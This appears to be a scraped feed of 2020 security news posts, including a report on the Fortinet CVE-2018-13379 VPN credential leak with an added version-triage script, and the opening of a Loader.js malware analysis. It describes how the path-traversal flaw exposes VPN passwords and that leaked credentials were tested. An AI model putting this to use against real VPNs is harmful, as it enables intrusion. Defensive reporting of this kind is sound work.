Companies without direct access to phone numbers can implement STIR/SHAKEN as well. Google, for example, integrated STIR/SHAKEN in its proprietary call blocking service.

Because the CPS has insight into all calls, its security needs to be carefully managed. The certification authority needs to gain approval from policymakers to run the CPS and be held accountable when things go wrong. In Canada, the Canadian Secure Token Governance Authority (CST-GA) is the central policymaker for digital certificates.

The governance authority has the highest authority in dictating policy. In Canada, that’s the CST-GA.

The business case lies in rich call data

STIR/SHAKEN also enables a key peripheral use: rich call data. Rich call data contains information about who is calling and why. Additionally, it can contain information like name, logo, picture, and call reason. It even allows for a URL that links to external files to give deeper caller context. Together with STIR/SHAKEN, users can authenticate calls at a glance and companies gain greater control over their brand’s appearance.

SHAKEN token with rich call data includes extra fields for added caller transparency.

“There’s real value in that, it’s an easy business case to justify,” said Jim Dalton, CEO of TransNexus at the 2020 Canadian Telecom Summit. “We believe customers are going to pay for rich call data. And we think that because there are enterprises saying ‘I need my calls answered’…that’s the obvious first market: to sell to give them control over their branding, how and when they make a call, how it’s displayed while they’re calling. And most of all, it’s going to improve their call completion rates.”

An example of rich call displays with SHAKEN. Note the customizable logo, caller name, and the verified caller ID indicated by the green checkmark.

RCD is coming to desktop phones, smartphones, smart TVs, and stationary phones. It can even come to virtual communication. Zoom calls, for example, don’t verify where the connection is coming from. The user can access a meeting by clicking on the invite in the email. Imposters can easily hijack the link and pretend to be the recipient.

“We think there’s value in that it gives you a security identity for these outbound calls that you make,” said Dalton. “And it’s going to be great for inbound call centers….when they get that digitally signed token, there’s been some vetting by the service provider…and they can verify it with that call. It’s going to make their call or authentication processes much more robust.”

It’s up to the telecom operators to implement STIR/SHAKEN, but smartphone manufacturers will need to support rich call data. Dalton said it will be market-driven; if there’s high user demand, then it’s very likely it will be added quickly.

When is STIR/SHAKEN coming to Canada?

STIR/SHAKEN is planned for June 2021, but Canadians already have basic call protection.

In December 2019, Canadian carriers deployed a rudimentary blocking feature that barred calls from bogus numbers. While it blocked the most flagrant calls, it does nothing to combat call spoofing.

Thus, the CRTC mandated carriers to add STIR/SHAKEN by September 2020. But due to the effects of the pandemic, Canadian operators requested the CRTC to extend its implementation date by nine months. Rogers cited that some technical standards relating to STIR/SHAKEN haven’t been defined and that it needed more time to renegotiate contracts with vendors.

The post SHAKE them and STIR them: how Canada is fighting scam calls first appeared on IT World Canada.

The genesis of an ethical digital blueprint for the post-pandemic economy | An interview with Danny Lange, SVP of AI at Unity Technologies

We recently chatted with Danny Lange, senior vice president of AI at Unity Technologies to get his thoughts on the role of artificial intelligence in advancing a more ethical blueprint for the post-pandemic economy.

The post The genesis of an ethical digital blueprint for the post-pandemic economy | An interview with Danny Lange, SVP of AI at Unity Technologies first appeared on IT World Canada.

How to Reduce Fake News in Online Advertising

Steps can be taken to reduce the threat of fake news infiltrating online advertising.

Speaking during the Westminster Forum Conference about tackling fake news and online misinformation, Konrad Shek, deputy director, policy and regulation at the Advertising Association, said the advent of disinformation has had an “enormous impact on trust in the media and politics.”

He said within commercial advertising there have been cases of false claims and promoted stories, and manipulated content, which can appear on social media and news feeds, while some websites that do “propagate false information are supported by adverts and legitimate ads can find themselves on these dubious websites.”

He also explained that there are online fraudsters that use tactics to better promote adverts, including adding clicks for misattribution, which can divert advertisers’ money to the fraudulent actor. “I’d refrain from saying that restricting adverts is a solution, as you have to think about the consequences of an approach and the impact it would have on the free internet,” he said. This calls for four options, he continued:

  1. Try and choke the funds to fake news websites, as brands are already sensitive about the impact of being associated with these websites and this is a good incentive to work towards being placed on such websites. However, he pointed out that the speed of ads in the supply chain means it may not always be possible to know where the ad has been published
  2. The use of standards and technology to reduce ad fraud and reduce advertising money in the supply chain. “There are already a number of industry standards that have anti-fraud certification processes,” he said, with technology that can aid in the fight against ad fraud with an ever-increasing number of detection and prevention tools. “To that end, it is really important that the ASA is properly funded and it can continue to invest in technology to help it spot non-compliant ads online”
  3. Aiding the general public to build resistance and encourage critical thinking skills. “We need to invest more in digital literacy to help people inoculate themselves against scams and misinformation,” he said. “With society as a whole, we need to look at media more critically – look at ads with a more critical eye and ask what the motivation behind it is, and is it too good to be true?”
  4. Address political advertising, as this is not regulated by the ASA. “Politicians and political parties need to come together to figure out an appropriate solution soon, as in the meantime, unregulated political advertising erodes trust in all advertising”

“There is obviously a lot more to be done,” Shek said. “Economic gain is a significant factor in why disinformation exists as advertising plays a core part in it, but we need to realize there are other factors in play.”

He claimed a solution requires a holistic and proper multi-disciplinary approach, and work needs to be done to ensure like-minded countries are allied on this, as it is hard to discern what is real and what is not.

Experts Call for Online Fake News to Be Addressed as #COVID19 Vaccine Emerges

There needs to be better steps taken by politicians and social media platforms to deal with fake news, especially as the COVID-19 vaccine is created.

Speaking during the Westminster Forum Conference on tackling fake news and online misinformation, event chair Khalid Mahmood MP, shadow defense minister for procurement, said, as we have seen throughout the pandemic, certain misinformation has been passed around and it is effective in getting to people. “That is just in terms of the pandemic that we are seeing at the moment,” he added, pointing out that fake news is published about politicians too.

He said an issue is how responsibility “is totally negated from platforms where someone can put whatever they want and move forward” and trying to trace that back and address that is becoming increasingly difficult as platforms take time to deal with it.

Admitting that this is a very difficult issue to deal with, he said we need to look at some sort of level footing on this, before it is out of control.

Commenting on the role of platform providers, Katie O’Donovan, head of public policy at Google UK, said there is a challenge around freedom of speech where the meaning around the words can vary, depending on how things are said.

She said: “So you cannot regulate words and sentences, you have to understand the context of how they were made, and ask what is the context and hyperbole and is it a threat made to an individual or a group of people?”  

Asked by Infosecurity if social media platforms are doing enough to prevent fake news whilst enabling free speech, O’Donovan said there is a need for more legislation and regulation. She argued that government is doing a good job on addressing a broad range of harms, whilst offering the opportunity to engage and to “have a vibrant online debate.” However, platforms have a responsibility not to wait for that regulation, and over the years, that has grown very steadily.

Michael Wendling, editor of the Trending and Anti-Disinformation Unit at BBC News, said there is going to be a massive wave of vaccine disinformation, which is ramping up now, and as the vaccine becomes available for COVID-19 “that will make what happened over the 5G masts look like a minor skirmish.” He said if measures by platforms are effective, there will be a larger take up of the vaccine, and if not, there will be less of a take up and the pandemic may continue.

Also speaking was Oscar Tapp-Scotting, deputy director for security and international at DCMS, who confirmed it has been working with platforms to address disinformation and has seen platforms take steps to reduce “misleading narratives.”

He said: “Each of the platforms is different; each has a different user base and provides information in different ways, so how they tackle this will vary by platform.” He also said that in a recent meeting with social media platforms, they would agree to work with healthcare organizations to publish correct information, so users have the ability to make the right choice.

Mahmood said there is a need for politicians to look at social media and how it deals with fake news, “and this has to be the way for all of us in how we deal with fake news, as ultimately there has to be some sort of responsibility between both us and the platforms and how we get the motion across and how we get them to work together.”

NCSC Helping Man United Recover from Cyber-Attack

The National Cyber Security Centre (NCSC) is assisting Manchester United in dealing with the cyber-attack which struck the English football club last week.

Last Friday, the Premier League side confirmed in a statement that an incident had taken place,  following which affected systems were shut down to “contain the damage and protect data.”

One week later and the club’s internal IT system is not fully back up and running, with staff still unable to access emails alongside other operations. The NCSC is now helping Manchester United as it seeks to secure its network before restoring its IT system to full capacity.

A NCSC spokesperson is quoted as saying: “The NCSC is aware of an incident affecting Manchester United football club and we are working with the organization and partners to understand the impact.”

In its original statement, Manchester United said that its website and app were unaffected by the attack and it was not aware of any breach of personal data belonging to fans or customers, and this was reiterated on Thursday night. Quoted in The Guardian, the new statement read: “This attack was by nature disruptive, but we are not currently aware of any fan data being compromised.

“Critical systems required for matches to take place at Old Trafford remained secure and games have gone ahead as normal.”

Manchester United added that it would not be commenting on who was responsible for the attack or the motives that lay behind it.

Security experts have suggested the attack is likely to be ransomware. Commenting earlier this week, Jon Niccolls, EMEA & APAC incident response lead at Check Point, said: “It isn’t clear what type of attack hit the club, but as its statement mentioned that it ‘shut down affected systems to contain the damage and protect data,’ this suggests ransomware, and possibly a double extortion attack where the attackers both steal data with the threat of leaking it, as well as encrypting it to disrupt operations.”

Commenting on the incident, Adam Enterkin, SVP, EMEA, BlackBerry, told Infosecurity: “The exploitation of sporting giants by cyber-criminals is not a surprise. Amid a pandemic characterized by opportunistic cyber-attackers, and a huge deficit of security professionals in the UK, such an attack was all but inevitable. Manchester United isn’t the first to be hacked, and it won’t be the last.

“These attacks are, however, preventable. The truth is that the entire nation needs better cyber-hygiene. Even national institutions like sports teams can fall prey to simple phishing emails, which are responsible for a large proportion of cyber-attacks. Cyber-criminals are waiting for organizations and the public to drop their guard. We must not give them the opportunity.” 

“Ultimately, security teams at football clubs need the same tech as major banks and hospitals, to protect livelihoods and customer data. AI technology can help manage the volume of potential threats, spotting anomalies in data and dealing with menial and repetitive tasks whilst flagging potentially serious situations to the cybersecurity team. Humans and tech must work hand-in-hand, so the professionals are equipped with the right knowledge and skill sets to keep our nation’s much-loved sporting institutions safe.”

Productivity Tools May Be Monitoring Workers’ Productivity

Regulatory and Employee Litigation Risks Face Businesses That Violate Privacy Rules
Warning to workers: Your productivity tools may also be tracking your workplace productivity, and your bosses may not even know it. But as more workplace surveillance capabilities appear, legal experts warn that organizations must ensure their tools do not violate employees' privacy rights.

Two in Five Home Workers Vulnerable to Cyber-Attacks

Two in five remote workers in the UK are vulnerable to cyber-attacks as they have not received information about how to avoid COVID-19 scams or had any video call security training. This is according to a new report by Fasthosts, which looked at the additional cyber-risks businesses are facing as a result of the shift to home working this year.

The study also found that over half (54%) of remote workers are currently operating without a VPN, potentially increasing the risk of personal and company data getting compromised. Additionally, around a quarter allow others in their household to look at confidential documents.

The researchers revealed that those employed in the science and pharmaceutical industry were most likely to allow other members of their household access to their work computer/laptop, while law enforcement and security staff were the biggest culprits in allowing access to confidential data and documents.

Despite recent positive news regarding the development of a vaccine for the virus, it is expected that there will be far more remote working going forward compared to pre-COVID. Fasthosts cited data from the Institute of Directors showing that three quarters (74%) of 958 company directors intend to continue with increased home working after the pandemic. It is therefore vital that organizations provide the tools and training to ensure their staff are more secure whilst operating from home.

Michelle Stark, sales and marketing director at Fasthosts, commented: “It’s sad to see the risks of cybercrime so prevalent whilst many Britons are working from home. Keeping you and the business safe online is critical to keep confidential data secure. We urge all consumers to read our top tips, be more mindful and seek the correct training whilst working from home.”

Last month, a study by Mimecast found that remote workers are increasingly putting corporate data and systems at risk by failing to follow best practice security.

A week later, Manchester United has yet to recover after a cyberattack

Manchester United is still facing problems after the cyber attack it suffered last week; it has yet to fully restore its systems.

Last week Manchester United was hit by a sophisticated cyber attack. The attack took place on Friday evening, and the football club shut down its systems to prevent the malware from spreading within its network.

“Manchester United can confirm that the club has experienced a cyber attack on our systems. The club has taken swift action to contain the attack and is currently working with expert advisers to investigate the incident and minimise the ongoing IT disruption.” reads a statement issued by the Manchester United and reported by The Guardian.

“Although this is a sophisticated operation by organised cyber criminals, the club has extensive protocols and procedures in place for such an event and had rehearsed for this eventuality. Our cyber defences identified the attack and shut down affected systems to contain the damage and protect data.”

Manchester United

The club notified the British authorities about the incident, including the Information Commissioner’s Office. The United also launched a forensic investigation into the incident.

A week later, Manchester United has yet to fully restore its computer systems, yesterday the company was still unable to send and receive emails, and other functions were unavailable too.

“Following the recent cyberattack on the club, our IT team and external experts secured our networks and have conducted forensic investigations,” Manchester United said in a statement.

The club did not comment on the possible culprits and their motivation; it only revealed that the attackers aimed to disrupt the targeted systems.

“This attack was by nature disruptive, but we are not currently aware of any fan data being compromised,” the club said. “Critical systems required for matches to take place at Old Trafford remained secure and games have gone ahead as normal.”

Pierluigi Paganini

(SecurityAffairs – hacking, cybercrime)

The post A week later, Manchester United has yet to recover after a cyberattack appeared first on Security Affairs.

You too can be a security intelligence expert, with these free tools from Recorded Future

Many thanks to the great folks at Recorded Future, who have sponsored my writing for the past week. If 2020 taught the security industry anything, it is this: There has never been a better time to be a cybercriminal. From extortion ransomware to cyberespionage campaigns, adversaries are capitalizing on uncertainty, causing chaos, and cashing in. …

Cybersecurity Predictions for 2021: Robot Overlords No, Connected Car Hacks Yes

While 2021 will present evolving threats and new challenges, it will also offer new tools and technologies that will we hope shift the balance towards the defense.

ThreatList: Cyber Monday Looms – But Shoppers Oblivious to Top Retail Threats

Online shoppers are blissfully unaware of credit card skimming threats and malicious shopping apps as they head into this year's Black Friday and Cyber Monday holiday shopping events.

Coffee Briefing, November 27, 2020 – Leadership changes, Dell’s Q3, and MSPs ask for help managing bad clients

Today's Coffee Briefing features a list of recent leadership changes, Dell's Q3 earnings, and social media chatter from MSPs seeking help with bad clients.

The post Coffee Briefing, November 27, 2020 - Leadership changes, Dell's Q3, and MSPs ask for help managing bad clients first appeared on IT World Canada.

New Code to Force Tech Giants to Provide Greater Data Transparency and Choice

The UK government has unveiled plans to develop a new statutory code for tech companies that is designed to give customers more choice and control over their data.

The Department for Digital, Culture, Media and Sport (DCMS) said that a dedicated Digital Markets Unit will work alongside regulators such as Ofcom and the Information Commissioners Office (ICO) to create and enforce the code, which will govern the behavior of digital platforms, including those funded by digital advertising currently dominating the market, such as Google and Facebook. Measures are likely to include forcing such firms to be more transparent about how they are using customer data and to offer consumers a choice on whether they’d like to receive personalized advertising.

Another important aim of the code is to harness more competition within the online publishing industry by helping ensure smaller businesses aren’t disadvantaged by tech giants. This could include ensuring small businesses have fair access to platform services that help them grow their online business, such as digital advertising.

The unit, which will be part of the Competitions and Markets Authority (CMA), will begin operating from April 2021, and may have the power to suspend, block and reverse decisions made by tech firms as well as impose financial penalties for non-compliance.

Issues surrounding the use of data online have come into sharper focus this year, with the COVID-19 pandemic leading to a huge rise in digital users, including the sharing of creative content and advertising of small businesses’ products and services.

Digital secretary Oliver Dowden commented: “I’m unashamedly pro-tech and the services of digital platforms are positively transforming the economy, bringing huge benefits to businesses, consumers and society.

“However, there is growing consensus in the UK and abroad that the concentration of power among a small number of tech companies is curtailing growth of the sector, reducing innovation and having negative impacts on the people and businesses that rely on them. It is time to address that and unleash a new age of tech growth.”

The global impact of the Fortinet 50.000 VPN leak posted online

The global impact of the Fortinet 50.000 VPN leak posted online, with many countries impacted, including Portugal.

A compilation of one-line exploits for the vulnerability tracked as CVE-2018-13379, which could be used to steal VPN credentials from nearly 50.000 Fortinet VPN devices, has been posted online.

This vulnerability is an improper limitation of a pathname to a restricted directory (“Path Traversal”) in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 under the SSL VPN web portal, which allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests. According to NIST NVD, the flaw has a CVSS base score of 9.8 – CRITICAL.

The compilation contains 49,577 IP addresses vulnerable to Fortinet SSL VPN CVE-2018-13379, according to Bank Security, who first noticed the leak on Twitter.

In detail, the exploitation of the critical Fortinet vulnerability puts the attacker in a privileged place, with access to the sensitive “sslvpn_websession” files from Fortinet VPNs.

After analyzing the leaked data, we noticed the list of vulnerable targets includes domains belonging to large enterprises, financial institutions, and government organizations from all over the world. In order to understand the volume and impact of this threat, we organized all the data on a geographic map presented below.

Geomap of impacted countries

As observed, the USA is the most impacted country, with a total of 10.103 vulnerable devices shared in this leak. China, Japan, Korea, Brazil, Germany, United Kingdom, Spain, Italy, and France complete the TOP 10 most impacted countries. Portugal can also be found in this list, with 136 vulnerable devices. Next, the complete list of this analysis is presented.

Complete list of affected countries

  • 10103 United States
  • 6336 China
  • 2821 Japan
  • 2543 Korea
  • 2280 Brazil
  • 2212 Germany
  • 2127 United Kingdom
  • 1547 Spain
  • 1370 Italy
  • 1294 France
  • 1096 Australia
  • 981 Russian Federation
  • 847 Netherlands
  • 761 Argentina
  • 688 Taiwan
  • 648 Canada
  • 575 Egypt
  • 569 Colombia
  • 520 South Africa
  • 444 India
  • 424 Poland
  • 400 Sweden
  • 397 Indonesia
  • 384 Denmark
  • 374 Mexico
  • 367 Switzerland
  • 364 Turkey
  • 353 Chile
  • 344 Viet Nam
  • 325 Venezuela
  • 308 Ukraine
  • 267 Hong Kong
  • 253 Pakistan
  • 238 Hungary
  • 226 Finland
  • 220 New Zealand
  • 217 Czech Republic
  • 206 Romania
  • 177 Belgium
  • 163 Austria
  • 153 Iran
  • 147 Philippines
  • 136 Portugal
  • 135 Estonia
  • 128 Norway
  • 123 Saudi Arabia
  • 122 Peru
  • 118 Ireland
  • 113 Panama
  • 110 Thailand
  • 104 Malaysia
  • 88 Kuwait
  • 87 Israel
  • 77 Uruguay
  • 73 Azerbaijan
  • 69 Singapore
  • 61 United Arab Emirates
  • 59 El Salvador
  • 58 Bangladesh
  • 55 Slovenia
  • 53 Greece
  • 51 Belarus
  • 51 Kenya
  • 46 Bulgaria
  • 45 Paraguay
  • 45 Slovakia
  • 43 Oman
  • 41 Ecuador
  • 41 Lithuania
  • 41 Morocco
  • 38 Honduras
  • 37 Dominican Republic
  • 31 Guatemala
  • 31 Seychelles
  • 30 Puerto Rico
  • 24 Latvia
  • 22 Macedonia
  • 21 Luxembourg
  • 20 Qatar
  • 19 Kazakhstan
  • 19 Kyrgyzstan
  • 18 Nicaragua
  • 17 Croatia
  • 17 Cyprus
  • 17 Lebanon
  • 16 Algeria
  • 15 Jordan
  • 14 Bahrain
  • 14 Costa Rica
  • 12 Ghana
  • 12 Moldova
  • 12 Syrian Arab Republic
  • 11 Nigeria
  • 11 Uzbekistan
  • 10 Bolivia
  • 10 Holy See (Vatican City State)
  • 10 Iraq
  • 10 Trinidad and Tobago
  • 9 Bosnia and Herzegovina
  • 9 Iceland
  • 8 Cameroon
  • 8 Palestinian Territory
  • 8 Tanzania
  • 7 Georgia
  • 7 Ivory Coast
  • 7 Mauritius
  • 7 Myanmar
  • 7 Zambia
  • 6 Angola
  • 6 Armenia
  • 6 Mozambique
  • 6 Sri Lanka
  • 5 French Polynesia
  • 5 Liberia
  • 5 Montenegro
  • 4 Palau
  • 4 Tunisia
  • 3 Afghanistan
  • 3 Aruba
  • 3 Fiji
  • 3 Malawi
  • 3 Nepal
  • 2 Aland Islands
  • 2 Bahamas
  • 2 Bermuda
  • 2 Cuba
  • 2 Guam
  • 2 Rwanda
  • 2 Uganda
  • 1 Andorra
  • 1 Belize
  • 1 Benin
  • 1 Botswana
  • 1 Cambodia
  • 1 Cayman Islands
  • 1 Guinea
  • 1 Martinique
  • 1 Papua New Guinea
  • 1 Republic of the Congo
  • 1 Reunion

Some days after the leak, another thread was published on the same forum. A threat actor shared the data dumped from the list of vulnerable devices, which contains the “sslvpn_websession” file for every IP.

As observed, these files reveal usernames, passwords, access levels (e.g., “full-access”, “root”), and the original unmasked IP addresses of the users connected to the VPNs.

The details exfiltrated from the vulnerable Fortinet VPNs, also posted on the forum, come as a file of a few megabytes that expands to over 7 GB when decompressed.

The exposure of passwords in these files can be abused by criminals to get a successful connection to the organization’s internal networks and bypass security restrictions as attackers are using, in some cases, high-privileged accounts. In other scenarios, these credentials could be reused by anyone with access to this dump to perform credential stuffing attacks.

Impact of this leak

Although this flaw was disclosed more than a year ago, several companies have yet to patch their systems, despite the many warnings from security experts. As a result of this leak, an attacker can access the sslvpn_websession files from Fortinet VPNs to steal login credentials, which could then be used to compromise a network and deploy malware.

In Portugal, 136 devices are vulnerable and were shared in this leak.

Many professionals have already validated these credentials. A successful login to a VPN Fortinet portal of a random organization, and successful authentication through the  VPN Fortinet client with a leaked password can be seen in the next images.

Last but not least, this is the time to implement an efficient patch management process and to fix a vulnerability that has been publicly disclosed for 2 years.

Affected Products
FortiOS 6.0 – 6.0.0 to 6.0.4
FortiOS 5.6 – 5.6.3 to 5.6.7
FortiOS 5.4 – 5.4.6 to 5.4.12

(other branches and versions than above are not impacted)

ONLY if the SSL VPN service (web-mode or tunnel-mode) is enabled.

Solutions
Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above.

More details here: https://www.fortiguard.com/psirt/FG-IR-18-384
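The "Affected Products" and "Solutions" lines above give everything a defender needs to triage an inventory of FortiOS devices: the three inclusive affected ranges, the first fixed release on each branch, and the condition that only devices with SSL VPN enabled are exposed. The following script, added here as an example and not part of the original article or of Fortinet's tooling, encodes those ranges and reports which devices need an upgrade. The host names and versions in the sample inventory are constructed for the example; the `Device` class, `parse_version`, `is_affected`, `fixed_version_for` and `triage` are all hypothetical helper names.

```python
"""Triage FortiOS builds against the CVE-2018-13379 affected ranges.

Added example: the ranges and fixed releases are the ones listed in the
advisory excerpt (FG-IR-18-384); everything else is constructed for illustration.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]

# Per branch: (first affected build, last affected build, first fixed build),
# all inclusive, as quoted in the "Affected Products" and "Solutions" lines.
# Branches not listed here (e.g. 6.2 and later) are not impacted.
AFFECTED_RANGES = {
    (5, 4): ((5, 4, 6), (5, 4, 12), (5, 4, 13)),
    (5, 6): ((5, 6, 3), (5, 6, 7), (5, 6, 8)),
    (6, 0): ((6, 0, 0), (6, 0, 4), (6, 0, 5)),
}


def parse_version(text: str) -> Version:
    """Turn a dotted FortiOS version string such as '6.0.4' into a comparable tuple."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised FortiOS version string: {text!r}")
    major, minor, patch = (int(p) for p in parts)
    return (major, minor, patch)


def affected_branch(version: Version):
    """Return the (low, high, fixed) triple for the version's branch, or None."""
    return AFFECTED_RANGES.get(version[:2])


def is_affected(version: Version, sslvpn_enabled: bool = True) -> bool:
    """True only when the build is inside an affected range AND SSL VPN is enabled."""
    if not sslvpn_enabled:
        return False
    branch = affected_branch(version)
    if branch is None:
        return False
    low, high, _fixed = branch
    return low <= version <= high


def fixed_version_for(version: Version) -> Optional[str]:
    """Minimal fixed release on the same branch, or None if the build is not affected."""
    if not is_affected(version):
        return None
    _low, _high, fixed = affected_branch(version)
    return ".".join(str(n) for n in fixed)


@dataclass
class Device:
    host: str
    version: str
    sslvpn_enabled: bool


def triage(devices: List[Device]) -> List[dict]:
    """Return one remediation record per affected device, in inventory order."""
    findings = []
    for d in devices:
        v = parse_version(d.version)
        if is_affected(v, d.sslvpn_enabled):
            findings.append({"host": d.host, "version": d.version,
                             "upgrade_to": fixed_version_for(v)})
    return findings


# Constructed sample inventory (hypothetical hosts and versions, not from the leak).
SAMPLE_INVENTORY = [
    Device("vpn-a.example.internal", "6.0.4", True),    # affected, SSL VPN on
    Device("vpn-b.example.internal", "6.0.5", True),    # first fixed 6.0 build
    Device("vpn-c.example.internal", "5.6.3", False),   # affected build, SSL VPN off
    Device("vpn-d.example.internal", "5.4.12", True),   # last affected 5.4 build
    Device("vpn-e.example.internal", "6.2.1", True),    # 6.2 branch is not impacted
]

if __name__ == "__main__":
    for f in triage(SAMPLE_INVENTORY):
        print(f"{f['host']}: FortiOS {f['version']} affected, "
              f"upgrade to {f['upgrade_to']} or later")
```

Boundary builds are the point of the test cases: 6.0.4 and 5.4.12 are the last affected builds on their branches and 6.0.5 the first fixed one, so an off-by-one in the comparison would misclassify exactly the devices most likely to be sitting one patch short. A device with SSL VPN disabled is reported as not affected, matching the advisory's condition, but a practitioner would still schedule the upgrade in case the service is enabled later.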

Original Post at https://seguranca-informatica.pt/the-global-impact-of-the-fortinet-50-000-vpn-leak-posted-online/#.X8Dk581Kg2x

About the author: Pedro Tavares

Pedro Tavares is a professional in the field of information security, working as an Ethical Hacker, Malware Analyst, Cybersecurity Analyst and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog seguranca-informatica.pt.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post The global impact of the Fortinet 50.000 VPN leak posted online appeared first on Security Affairs.

Positioned for success: Why Canada’s leading realtor was ready for the new normal

As a frontrunner in the use of digital property search and interactive mapping technology, Royal LePage (RLP) was a step ahead of the COVID-19 crisis by already having many of the tools for remote real estate services. Foremost among these is a reimagined intranet portal created and managed by WatServ, a Gold Level Microsoft Cloud…

The post Positioned for success: Why Canada’s leading realtor was ready for the new normal first appeared on IT World Canada.

Cyber Security Today – Ransomware hits fertility clinics, a news agency and a school board

Today's podcast reports on three of the latest ransomware attacks, a cyber attack on network equipment maker Beldon and a police effort to foil credit card scams

The post Cyber Security Today - Ransomware hits fertility clinics, a news agency and a school board first appeared on IT World Canada.

Undermining Democracy

Last Thursday, Rudy Giuliani, a Trump campaign lawyer, alleged a widespread voting conspiracy involving Venezuela, Cuba, and China. Another lawyer, Sidney Powell, argued that Mr. Trump won in a landslide, the entire election in swing states should be overturned and the legislatures should make sure that the electors are selected for the president.

The Republican National Committee swung in to support her false claim that Mr. Trump won in a landslide, while Michigan election officials have tried to stop the certification of the vote.

It is wildly unlikely that their efforts can block Joe Biden from becoming president. But they may still do lasting damage to American democracy for a shocking reason: the moves have come from trusted insiders.

American democracy’s vulnerability to disinformation has been very much in the news since the Russian disinformation campaign in 2016. The fear is that outsiders, whether they be foreign or domestic actors, will undermine our system by swaying popular opinion and election results.

This is half right. American democracy is an information system, in which the information isn’t bits and bytes but citizens’ beliefs. When peoples’ faith in the democratic system is undermined, democracy stops working. But as information security specialists know, outsider attacks are hard. Russian trolls, who don’t really understand how American politics works, have actually had a difficult time subverting it.

When you really need to worry is when insiders go bad. And that is precisely what is happening in the wake of the 2020 presidential election. In traditional information systems, the insiders are the people who have both detailed knowledge and high level access, allowing them to bypass security measures and more effectively subvert systems. In democracy, the insiders aren’t just the officials who manage voting but also the politicians who shape what people believe about politics. For four years, Donald Trump has been trying to dismantle our shared beliefs about democracy. And now, his fellow Republicans are helping him.

Democracy works when we all expect that votes will be fairly counted, and defeated candidates leave office. As the democratic theorist Adam Przeworski puts it, democracy is “a system in which parties lose elections.” These beliefs can break down when political insiders make bogus claims about general fraud, trying to cling to power when the election has gone against them.

It’s obvious how these kinds of claims damage Republican voters’ commitment to democracy. They will think that elections are rigged by the other side and will not accept the judgment of voters when it goes against their preferred candidate. Their belief that the Biden administration is illegitimate will justify all sorts of measures to prevent it from functioning.

It’s less obvious that these strategies affect Democratic voters’ faith in democracy, too. Democrats are paying attention to Republicans’ efforts to stop the votes of Democratic voters, and especially Black Democratic voters, from being counted. They, too, are likely to have less trust in elections going forward, and with good reason. They will expect that Republicans will try to rig the system against them. Mr. Trump is having a hard time winning unfairly, because he has lost in several states. But what if Mr. Biden’s margin of victory depended only on one state? What if something like that happens in the next election?

The real fear is that this will lead to a spiral of distrust and destruction. Republicans, who are increasingly committed to the notion that the Democrats are committing pervasive fraud, will do everything that they can to win power and to cling to power when they can get it. Democrats, seeing what Republicans are doing, will try to entrench themselves in turn. They suspect that if the Republicans really win power, they will not ever give it back. The claims of Republicans like Senator Mike Lee of Utah that America is not really a democracy might become a self-fulfilling prophecy.

More likely, this spiral will not directly lead to the death of American democracy. The U.S. federal system of government is complex and hard for any one actor or coalition to dominate completely. But it may turn American democracy into an unworkable confrontation between two hostile camps, each unwilling to make any concession to its adversary.

We know how to make voting itself more open and more secure; the literature is filled with vital and important suggestions. The more difficult problem is this. How do you shift the collective belief among Republicans that elections are rigged?

Political science suggests that partisans are more likely to be persuaded by fellow partisans, like Brad Raffensperger, the Republican secretary of state in Georgia, who said that election fraud wasn’t a big problem. But this would only be effective if other well-known Republicans supported him.

Public outrage, alternatively, can sometimes force officials to back down, as when people crowded in to denounce the Michigan Republican election officials who were trying to deny certification of their votes.

The fundamental problem, however, is Republican insiders who have convinced themselves that to keep and hold power, they need to trash the shared beliefs that hold American democracy together.

They may have long-term worries about the consequences, but they’re unlikely to do anything about those worries in the near-term unless voters, wealthy donors or others whom they depend on make them pay short-term costs.

This essay was written with Henry Farrell, and previously appeared in the New York Times.

SMB Skills Gaps and #COVID19 Imperil Cyber-Resilience


Skills gaps and mass remote working are the biggest security challenges facing small- and medium-sized businesses (SMBs) today, according to new research from Infosecurity Europe.

The organizers behind the number one cybersecurity event in the region canvassed opinion from nearly 3700 industry experts via a Twitter poll.

A plurality (42%) cited a lack of security expertise as the number one challenge to cyber-resilience facing SMBs, while COVID-related lockdowns came second with 34%.

According to the latest global figures, industry skills shortages have come down since last year, from 4.07 million to 3.12 million. However, while many are joining the industry, the narrowing gap can partly be explained by job losses during the pandemic.

SMBs often find it hardest to recruit and have fewer resources to spend on training. That’s a concern considering half (50%) of respondents claimed small firms are mainly responsible for in-house education and training.

SMBs are also often hardest hit by recession. A recent study from O2 and the Center for Economic Business Research (CEBR) claimed that small businesses would be hit six times harder than after the financial crash of 2008.

Unsurprisingly, a quarter (24%) of small businesses said they are spending less because of the pandemic, with only 18% spending more to improve cyber-resilience. Perhaps reassuringly, over two-fifths (43%) said “little has changed” financially.

“Typical challenges such as lack of budget, staff being stretched thin and a changing threat environment have all been amplified in 2020. For many small businesses, the focus was on making sure they could still operate, and concerns like cyber-resilience were not necessarily a priority,” says Heidi Shey, principal analyst at Forrester Research.

“If business is down, cuts have to come from somewhere. Harder-hit sectors like retail or travel had to make different choices than those in a more fortunate position. Most spending was reactive; to support remote work, many had to make investments in things like laptops, VPNs and collaboration applications.”

Infosecurity Europe is scheduled to take place June 8-10 2021 at London’s Olympia.

Ransomware: IT Services Firm Faces $60 Million Recovery

France's Sopra Steria Was Hit By Previously Unseen Version of Ryuk Ransomware
French IT services firm Sopra Steria, which was hit with Ryuk ransomware in October, now estimates that the attack could cost the company up to $60 million in recovery costs. Experts say that after going quiet in March, Ryuk reappeared in September, and has targeted numerous hospitals.

Threat Actor: Unknown

Today I’d like to share a quick analysis of a quite new and unknown threat spotted in the wild. The file which grabbed my attention is called Loader.js (md5: 59a03086db5ebd33615b819a7c3546a5) and, if you wish, you can download it from Yomi. A very similar (or maybe the same) threat was observed in past months by @MalwareHunterTeam, which published the following tweet about it. Despite the nice tweet, the thread ended without any further action or attribution (at least as far as I understand).

So I decided to share what little I learned about this sample and about the infrastructure behind it. The purpose of this post is to take a closer look at the threat, without pretending to attribute or name it.

Analysis

